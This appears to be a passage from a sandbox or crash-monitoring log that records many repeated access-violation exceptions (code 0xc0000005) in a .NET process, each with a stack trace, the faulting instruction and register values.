__exception__ July 10, 2023, 6:13 p.m.	stacktrace: 0xad46c30 0xad42c8c 0xad42522 0xad4240d 0xad40cab 0x4c5faa1 0x4c5d9ff 0x4c57c1d 0x4c572d3 0x4c53c6b 0x4c535d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72402652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7241264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72412e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x724c74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x724c7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72551dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72551e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72551f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7255416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72aaf5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72b27f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72b24de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xad46c73 registers.esp: 38201828 registers.edi: 38202172 registers.eax: 0 registers.ebp: 38201836 registers.edx: 0 registers.ebx: 38204804 registers.esi: 43564680 registers.ecx: 46244908	1
__exception__ July 10, 2023, 6:13 p.m.	stacktrace: 0xad426c1 0xad42522 0xad4240d 0xad40cab 0x4c5faa1 0x4c5d9ff 0x4c57c1d 0x4c572d3 0x4c53c6b 0x4c535d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72402652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7241264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72412e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x724c74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x724c7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72551dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72551e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72551f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7255416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72aaf5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72b27f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72b24de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 39 09 ff 15 dc 98 99 0a 89 85 04 ff ff ff 8b 85 exception.instruction: cmp dword ptr [ecx], ecx exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xad43302 registers.esp: 38201540 registers.edi: 38201840 registers.eax: 0 registers.ebp: 38201852 registers.edx: 177837760 registers.ebx: 38204804 registers.esi: 43564680 registers.ecx: 0	1
__exception__ July 10, 2023, 6:13 p.m.	stacktrace: 0xad46c30 0xad42c8c 0xad42522 0xad4240d 0xad40cab 0x4c5faa1 0x4c5d9ff 0x4c57c1d 0x4c572d3 0x4c53c6b 0x4c535d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72402652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7241264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72412e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x724c74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x724c7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72551dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72551e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72551f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7255416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72aaf5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72b27f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72b24de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xad46c73 registers.esp: 38201828 registers.edi: 38202172 registers.eax: 0 registers.ebp: 38201836 registers.edx: 0 registers.ebx: 38204804 registers.esi: 43564680 registers.ecx: 43809444	1
__exception__ July 10, 2023, 6:13 p.m.	stacktrace: 0xad471a8 0xad46ff9 0xad423f5 0xad40f94 0x4c5faa1 0x4c5d9ff 0x4c57c1d 0x4c572d3 0x4c53c6b 0x4c535d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72402652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7241264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72412e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x724c74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x724c7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72551dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72551e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72551f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7255416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72aaf5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72b27f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72b24de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 39 09 ff 15 dc 98 99 0a 89 85 04 ff ff ff 8b 85 exception.instruction: cmp dword ptr [ecx], ecx exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xad43302 registers.esp: 38201516 registers.edi: 38201816 registers.eax: 0 registers.ebp: 38201828 registers.edx: 177837760 registers.ebx: 38204804 registers.esi: 42767932 registers.ecx: 0	1
__exception__ July 10, 2023, 6:13 p.m.	stacktrace: 0xad46c30 0xad4773e 0xad46ff9 0xad423f5 0xad40f94 0x4c5faa1 0x4c5d9ff 0x4c57c1d 0x4c572d3 0x4c53c6b 0x4c535d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72402652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7241264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72412e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x724c74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x724c7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72551dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72551e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72551f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7255416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72aaf5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72b27f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72b24de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xad46c73 registers.esp: 38201804 registers.edi: 38202196 registers.eax: 0 registers.ebp: 38201812 registers.edx: 0 registers.ebx: 38204804 registers.esi: 42767932 registers.ecx: 45244316	1
__exception__ July 10, 2023, 6:13 p.m.	stacktrace: 0xad471a8 0xad46ff9 0xad4240d 0xad40f94 0x4c5faa1 0x4c5d9ff 0x4c57c1d 0x4c572d3 0x4c53c6b 0x4c535d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72402652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7241264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72412e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x724c74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x724c7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72551dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72551e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72551f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7255416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72aaf5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72b27f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72b24de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 39 09 ff 15 dc 98 99 0a 89 85 04 ff ff ff 8b 85 exception.instruction: cmp dword ptr [ecx], ecx exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xad43302 registers.esp: 38201516 registers.edi: 38201816 registers.eax: 0 registers.ebp: 38201828 registers.edx: 177837760 registers.ebx: 38204804 registers.esi: 42767932 registers.ecx: 0	1
__exception__ July 10, 2023, 6:13 p.m.	stacktrace: 0xad46c30 0xad4773e 0xad46ff9 0xad4240d 0xad40f94 0x4c5faa1 0x4c5d9ff 0x4c57c1d 0x4c572d3 0x4c53c6b 0x4c535d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72402652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7241264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72412e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x724c74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x724c7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72551dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72551e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72551f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7255416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72aaf5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72b27f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72b24de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xad46c73 registers.esp: 38201804 registers.edi: 38202196 registers.eax: 0 registers.ebp: 38201812 registers.edx: 0 registers.ebx: 38204804 registers.esi: 42767932 registers.ecx: 46812572	1
__exception__ July 10, 2023, 6:13 p.m.	stacktrace: 0xad471a8 0xad46ff9 0xad4240d 0xad40f94 0x4c5faa1 0x4c5d9ff 0x4c57c1d 0x4c572d3 0x4c53c6b 0x4c535d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72402652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7241264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72412e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x724c74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x724c7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72551dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72551e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72551f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7255416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72aaf5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72b27f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72b24de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 39 09 ff 15 dc 98 99 0a 89 85 04 ff ff ff 8b 85 exception.instruction: cmp dword ptr [ecx], ecx exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xad43302 registers.esp: 38201516 registers.edi: 38201816 registers.eax: 0 registers.ebp: 38201828 registers.edx: 177837760 registers.ebx: 38204804 registers.esi: 42767932 registers.ecx: 0	1
__exception__ July 10, 2023, 6:13 p.m.	stacktrace: 0xad46c30 0xad4773e 0xad46ff9 0xad4240d 0xad40f94 0x4c5faa1 0x4c5d9ff 0x4c57c1d 0x4c572d3 0x4c53c6b 0x4c535d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72402652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7241264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72412e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x724c74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x724c7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72551dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72551e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72551f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7255416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72aaf5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72b27f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72b24de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xad46c73 registers.esp: 38201804 registers.edi: 38202196 registers.eax: 0 registers.ebp: 38201812 registers.edx: 0 registers.ebx: 38204804 registers.esi: 42767932 registers.ecx: 48162260	1
__exception__ July 10, 2023, 6:13 p.m.	stacktrace: 0xad47ae2 0xad478f1 0xad423f5 0xad410ac 0x4c5faa1 0x4c5d9ff 0x4c57c1d 0x4c572d3 0x4c53c6b 0x4c535d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72402652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7241264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72412e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x724c74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x724c7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72551dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72551e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72551f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7255416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72aaf5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72b27f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72b24de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 39 09 ff 15 dc 98 99 0a 89 85 04 ff ff ff 8b 85 exception.instruction: cmp dword ptr [ecx], ecx exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xad43302 registers.esp: 38201568 registers.edi: 38201868 registers.eax: 0 registers.ebp: 38201880 registers.edx: 177837760 registers.ebx: 38204804 registers.esi: 42767932 registers.ecx: 0	1
__exception__ July 10, 2023, 6:13 p.m.	stacktrace: 0xad46c30 0xad47f4a 0xad478f1 0xad423f5 0xad410ac 0x4c5faa1 0x4c5d9ff 0x4c57c1d 0x4c572d3 0x4c53c6b 0x4c535d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72402652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7241264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72412e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x724c74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x724c7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72551dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72551e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72551f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7255416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72aaf5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72b27f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72b24de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xad46c73 registers.esp: 38201856 registers.edi: 38202196 registers.eax: 0 registers.ebp: 38201864 registers.edx: 0 registers.ebx: 38204804 registers.esi: 42767932 registers.ecx: 43389932	1
__exception__ July 10, 2023, 6:13 p.m.	stacktrace: 0xad47ae2 0xad478f1 0xad4240d 0xad410ac 0x4c5faa1 0x4c5d9ff 0x4c57c1d 0x4c572d3 0x4c53c6b 0x4c535d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72402652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7241264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72412e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x724c74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x724c7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72551dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72551e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72551f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7255416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72aaf5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72b27f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72b24de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 39 09 ff 15 dc 98 99 0a 89 85 04 ff ff ff 8b 85 exception.instruction: cmp dword ptr [ecx], ecx exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xad43302 registers.esp: 38201568 registers.edi: 38201868 registers.eax: 0 registers.ebp: 38201880 registers.edx: 177837760 registers.ebx: 38204804 registers.esi: 42764684 registers.ecx: 0	1
__exception__ July 10, 2023, 6:13 p.m.	stacktrace: 0xad46c30 0xad47f4a 0xad478f1 0xad4240d 0xad410ac 0x4c5faa1 0x4c5d9ff 0x4c57c1d 0x4c572d3 0x4c53c6b 0x4c535d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72402652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7241264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72412e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x724c74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x724c7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72551dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72551e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72551f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7255416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72aaf5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72b27f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72b24de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 8b 40 04 89 45 fc 90 eb 00 8b 45 fc 8b e5 5d c3 exception.instruction: mov eax, dword ptr [eax + 4] exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xad46c73 registers.esp: 38201856 registers.edi: 38202196 registers.eax: 0 registers.ebp: 38201864 registers.edx: 0 registers.ebx: 38204804 registers.esi: 42764684 registers.ecx: 44880728	1
__exception__ July 10, 2023, 6:13 p.m.	stacktrace: 0xad47ae2 0xad478f1 0xad4240d 0xad410ac 0x4c5faa1 0x4c5d9ff 0x4c57c1d 0x4c572d3 0x4c53c6b 0x4c535d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72402652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7241264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72412e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x724c74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x724c7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72551dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72551e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72551f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7255416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72aaf5a3 CreateConfigStream+0x13f GetProcessExecutableHeap-0xad6 mscoree+0x7f16 @ 0x72b27f16 _CorExeMain+0x8 CreateConfigStream-0x2ff4 mscoree+0x4de3 @ 0x72b24de3 RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5 exception.instruction_r: 39 09 ff 15 dc 98 99 0a 89 85 04 ff ff ff 8b 85 exception.instruction: cmp dword ptr [ecx], ecx exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0xad43302 registers.esp: 38201568 registers.edi: 38201868 registers.eax: 0 registers.ebp: 38201880 registers.edx: 177837760 registers.ebx: 38204804 registers.esi: 42764684 registers.ecx: 0	1
__exception__ July 10, 2023, 6:13 p.m.	stacktrace: 0xad46c30 0xad47f4a 0xad478f1 0xad4240d 0xad410ac 0x4c5faa1 0x4c5d9ff 0x4c57c1d 0x4c572d3 0x4c53c6b 0x4c535d9 DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72402652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7241264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72412e95 DllGetClassObjectInternal+0x2473 CorDllMainForThunk-0x8a088 clr+0xc74ec @ 0x724c74ec DllGetClassObjectInternal+0x2597 CorDllMainForThunk-0x89f64 clr+0xc7610 @ 0x724c7610 CorDllMainForThunk+0x850 _CorExeMain-0x238a clr+0x151dc4 @ 0x72551dc4 CorDllMainForThunk+0x8f3 _CorExeMain-0x22e7 clr+0x151e67 @ 0x72551e67 CorDllMainForThunk+0xa06 _CorExeMain-0x21d4 clr+0x151f7a @ 0x72551f7a _CorExeMain+0x1c ClrCreateManagedInstance-0x35cd clr+0x15416a @ 0x7255416a _CorExeMain+0x71 GetFileVersion-0x293a mscoreei+0xf5a3 @ 0x72aaf5a3 CreateConfigStream+0x13f 